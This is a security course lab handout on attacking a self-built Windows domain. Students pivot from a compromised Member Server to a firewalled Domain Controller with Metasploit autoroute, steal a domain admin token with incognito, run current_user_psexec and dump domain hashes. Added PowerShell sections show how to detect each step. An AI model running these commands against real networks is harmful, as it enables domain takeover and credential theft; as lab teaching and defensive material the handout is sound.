Proj 17x: Pivoting and Exploiting a Domain Controller (20 pts. extra credit)

What You Need for this Project

Purpose

To practice pivoting, token theft, and exploiting a Domain Controller.

Start your Domain Controller

Start the Domain Controller you made in the previous project.

Start the Member Server

Start your Member Server.

Log in as

Verifying Domain Configuration

On your Member Server, at the lower left of the desktop, right-click the third icon. Click "Run as Administrator", as shown below.

A User Account Control box pops up. Click Yes.

In the Administrator PowerShell window, execute this command:

ping hackme.com
You should get replies, as shown below.

If you don't, you need to fix your networking problems before proceeding with this project.

Find the IP Address of your Member Server

On your Member Server, in PowerShell, execute the ipconfig command.

Make a note of your IP address.

Log On to the Domain Controller

Click on the desktop of your Domain Controller. Send Ctrl+Alt+Delete to it.

Click "Other User" and log in with these credentials:

The desktop appears, and Server Manager opens.

Restricting Access to the Domain Controller

In Server Manager, at the top right, click Tools, "Windows Firewall with Advanced Security", as shown below.

In Windows Firewall with Advanced Security, on the left side, click "Inbound Rules", as shown below.

On the right side, click "New Rule", as shown below.

The New Inbound Rule Wizard opens. Click Custom, as shown below.

Click Next.

On the "Program" page, verify that the "All programs" radio button is selected and click Next.

On the "Protocol and Ports" page, leave everything at its default and click Next.

On the "Scope" page, in the lower section, click "These IP Addresses", as shown below.

On the right side, click the Add... button.

In the "IP Address" box, click "This IP address range".

Enter a "From" and "To" address that includes your Kali attacker, but not the Member server, as shown below.

Click OK.

Click Next.

In the "Action" box, click "Block the connection" as shown below.

Click Next.

Click Next.

In the "Name" box, enter a Name of "Isolate DC" as shown below.

Click Finish.
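The same "Isolate DC" rule can be built and checked from an Administrator PowerShell on the Domain Controller. This is an added example, not part of the original project; the address range in it is a constructed placeholder, so substitute the range that contains your Kali attacker but not your Member Server.

```powershell
# Added example, not part of the original project: the "Isolate DC" rule
# built from PowerShell instead of the wizard, plus a check of what it
# does and does not cover.
# Constructed placeholder range: substitute the range that contains your
# Kali attacker but not your Member Server.
$blockedRange = '172.16.1.50-172.16.1.60'

New-NetFirewallRule -DisplayName 'Isolate DC' `
    -Direction Inbound `
    -Action Block `
    -Profile Any `
    -RemoteAddress $blockedRange

# The scope lives on the rule's address filter, so read it back from there;
# Get-NetFirewallRule alone does not display the remote address range.
Get-NetFirewallRule -DisplayName 'Isolate DC' |
    Get-NetFirewallAddressFilter |
    Select-Object RemoteAddress

# Defender's check: every enabled inbound allow rule that is not scoped to a
# remote address. Each one is a path that a host outside the blocked range
# (the Member Server, in this project) can still use to reach the DC.
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow |
    Get-NetFirewallAddressFilter |
    Where-Object { $_.RemoteAddress -eq 'Any' } |
    Select-Object InstanceID, RemoteAddress
```

The last query is the point of the rule for a defender: blocking one attacker range leaves every other host on the subnet able to reach the DC, which is exactly the gap the rest of this project exercises. The production-style control is the inverse, allowing management ports only from a short list of admin hosts.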

Finding the Domain Controller's IP Address

On the Domain Controller, open PowerShell and execute the IPCONFIG command. Make a note of its IP address.

Exploiting the Member Server with ETERNALROMANCE

You should already have done this in a previous project, so you have a Meterpreter session on the Member Server with SYSTEM privileges.

Scanning the Network with netdiscover

On Kali, in a Terminal window, execute this command, replacing the IP address range with the correct range for your network.
netdiscover -r 172.16.1.0/24
A list of IP addresses appears, as shown below.

You should see your Domain Controller in the list. For me, it was at 172.16.1.201.

Scanning the Domain Controller with nmap

On Kali, in a Terminal window, execute this command, replacing the IP address with the IP address of your Domain Controller.
nmap 172.16.1.201
All ports are filtered, as shown below. This is because the firewall rule is blocking probes from our Kali machine.

Configuring a Route on the Member Server

On Kali, in the Meterpreter session controlling the Member Server, execute this command:
background
That places the session in the background.

On Kali, in msfconsole, execute these commands:

use post/multi/manage/autoroute
show info
Information appears about the module, as shown below.

On Kali, in msfconsole, execute these commands. Replace the IP address with the IP address of the network containing your Domain Controller.

set SESSION 1
set CMD add
set SUBNET 172.16.1.0
exploit
The module runs, adding a route to the subnet, as shown below.

On Kali, execute these commands to see the routing table.

set CMD print
exploit
The routing table now sends traffic to the subnet through session 1, as shown below.

Scanning the Domain Controller

On Kali, execute these commands to see how Metasploit's port scanner works.
use auxiliary/scanner/portscan/tcp
show info
The parameters are explained, as shown below.

On Kali, execute these commands to scan TCP ports 139 and 445 on the Domain Controller.

Replace the IP address with the IP address of your Domain Controller.

set PORTS 139,445
set RHOSTS 172.16.1.201
exploit
The ports are open, because we are pivoting through the Member Server, as shown below.

Saving the Screen Image

Make sure you can see two "TCP OPEN" messages, as shown above.

Save a FULL DESKTOP image with the filename Proj 17xa from Your Name.

Exploitation Options

To exploit the domain controller, we could use ETERNALROMANCE again, or pass the hash, but for this project we'll use token theft, just to practice it.

Enumerating Tokens

On Kali, execute these commands to see the privilege tokens available on the Member Server.
sessions -i 1
use incognito
list_tokens -u
The only domain account available now is HACKME/Sally, as shown below.

Opening a Privileged Session from the Member Server

Token theft will only work when there's a process running with elevated privileges, which there often is.

For this project, we'll open a privileged Command Prompt to serve that role.

Click on the desktop of your Member Server.

Press Enter.

It goes to a login screen. Send Ctrl+Alt+Delete.

Log in with these credentials:

The desktop appears.

At the lower left of the desktop, click the third icon to open PowerShell.

In PowerShell, execute this command:

runas /user:administrator@hackme.com cmd
It asks for your password. Enter this password:

P@ssw0rd123

A Command Prompt opens, running with domain administrator privileges, as shown below.

Enumerating Tokens

On Kali, in the Meterpreter session, execute this command.
list_tokens -u
Now a domain administrator token is available, as shown below.

Escalating Privileges to Domain Admin

On Kali, in the Meterpreter session, execute these commands.
impersonate_token HACKME\\Administrator
shell
whoami
You are now a domain administrator, as shown below.
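The condition that made this work is visible from the Member Server itself: a process running under a domain account that does not belong on that host, created by a runas logon. The following is an added example, not part of the original project; it runs from an Administrator PowerShell on the Member Server (Get-Process -IncludeUserName needs elevation and PowerShell 4 or later). HACKME is the project's domain; the list of domain accounts expected on this host is an assumption to tailor per server.

```powershell
# Added example, not part of the original project: find the precondition of
# token theft on a member server (a process owned by a domain account that
# should not be there) and the runas logon that created it.
# HACKME is the project's domain; $expected is an assumption to tailor.
$domain   = 'HACKME'
$expected = @("$domain\sally")   # assumption: the only domain user expected here

# 1. Processes owned by domain accounts other than the expected ones.
#    (-IncludeUserName requires an elevated PowerShell 4 or later.)
Get-Process -IncludeUserName |
    Where-Object { $_.UserName -like "$domain\*" -and ($expected -notcontains $_.UserName) } |
    Select-Object Id, ProcessName, UserName, SessionId |
    Sort-Object UserName, Id |
    Format-Table -AutoSize

# 2. The logons behind them. runas writes a 4648 ("A logon was attempted
#    using explicit credentials") from the calling process, followed by a
#    4624 for the new logon. A domain admin in either event on a member
#    server is worth a question even when it turns out to be legitimate.
$since = (Get-Date).AddHours(-24)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624, 4648; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Pull the named EventData fields out of the event XML.
        $xml    = [xml]$_.ToXml()
        $fields = @{}
        foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Id        = $_.Id
            Account   = "$($fields['TargetDomainName'])\$($fields['TargetUserName'])"
            LogonType = $fields['LogonType']      # present on 4624 only
            Process   = $fields['ProcessName']
        }
    } |
    # -match rather than -like: a UPN-style runas (administrator@hackme.com)
    # can land in TargetUserName with an empty TargetDomainName.
    Where-Object { $_.Account -match [regex]::Escape($domain) -and ($expected -notcontains $_.Account) } |
    Format-Table -AutoSize
```

In this project the first query shows the cmd.exe started with runas, owned by the domain Administrator, and the second shows the 4648/4624 pair that created it. The mitigation the query points at is simply not having that process exist: administrators log on to member servers with accounts that are not domain admins, and tiered admin accounts never leave an interactive session on a lower-tier host.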

Backgrounding the Channel and Session

At the Command Prompt, execute this command:
exit
At the meterpreter prompt, execute this command:
background
You are now back in Metasploit, as shown below.

(Because I shut down my machine and re-started the project, my session is now 2; yours may still be 1.)

Exploiting the Domain Controller

In Metasploit, execute these commands.
use exploit/windows/local/current_user_psexec
show info
This exploit lets us run code on the domain controller using the token, without a need for a password or hash, as shown below.

At the meterpreter prompt, execute these commands. Use the IP address of your Domain Controller and the session number of your Domain Admin session.

set RHOSTS 172.16.1.201
set SESSION 2
exploit
A new session opens, as shown below.

Execute these commands to interact with the new session, and see the system information. Adjust the session number as needed.

sessions -i 3
sysinfo

At the meterpreter prompt, execute this command:

background
You are now back in Metasploit.
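On the Domain Controller side, this step leaves two traces a defender can look for: Metasploit's psexec-style modules run code on the target by installing a service, which the System log records as event 7045, and the pivoted connection from the Member Server appears as a network (type 3) logon in the Security log. The following triage commands are an added example, not part of the original project; run them from an Administrator PowerShell on the Domain Controller. The Member Server address is an assumption, so substitute yours.

```powershell
# Added example, not part of the original project: post-exercise triage on
# the Domain Controller. Service installation (7045) and network logons of
# privileged accounts from the Member Server (4624, logon type 3).
$memberServer = '172.16.1.200'   # assumption: your Member Server's IP address
$since        = (Get-Date).AddHours(-2)

# 1. Services installed recently. A random-looking name with an image path
#    under ADMIN$ or a temp directory is the classic psexec footprint.
#    Properties follow the 7045 layout: ServiceName, ImagePath, ServiceType,
#    StartType, AccountName.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated,
        @{ n = 'ServiceName'; e = { $_.Properties[0].Value } },
        @{ n = 'ImagePath';   e = { $_.Properties[1].Value } },
        @{ n = 'RunAs';       e = { $_.Properties[4].Value } } |
    Format-Table -AutoSize -Wrap

# 2. Network logons (type 3) from the Member Server in the last two hours.
#    The XPath selects on the named EventData fields, so no parsing is needed;
#    timediff is in milliseconds. Properties follow the 4624 layout:
#    [5] TargetUserName, [6] TargetDomainName, [10] AuthenticationPackageName,
#    [11] WorkstationName.
$xpath = "*[System[EventID=4624 and TimeCreated[timediff(@SystemTime) <= 7200000]] " +
         "and EventData[Data[@Name='LogonType']='3' and Data[@Name='IpAddress']='$memberServer']]"
Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
    Select-Object TimeCreated,
        @{ n = 'Account';     e = { "$($_.Properties[6].Value)\$($_.Properties[5].Value)" } },
        @{ n = 'AuthPackage'; e = { $_.Properties[10].Value } },
        @{ n = 'Workstation'; e = { $_.Properties[11].Value } } |
    Format-Table -AutoSize
```

The second query is the one that matters for this project: the logon is a normal, successful authentication of the real domain Administrator, because the stolen token is the account's own credential. Nothing about it looks like an exploit; what makes it detectable is the source, a member server that should have no reason to open an administrative SMB session to a DC.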

Dumping Domain Hashes

In Metasploit, execute these commands.
use post/windows/gather/smart_hashdump
show info
This exploit dumps domain hashes, as shown below.

At the meterpreter prompt, execute these commands. Use the session number of your Domain Controller session.

set SESSION 5
exploit
Hashes appear, as shown below.

Saving the Screen Image

Make sure you can see the message "This host is a Domain Controller!" and some hashes, as shown above.

Save a FULL DESKTOP image with the filename Proj 17xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124m@gmail.com with a Subject line of Proj 17x from Your Name.

Posted 9-27-17 by Sam Bowne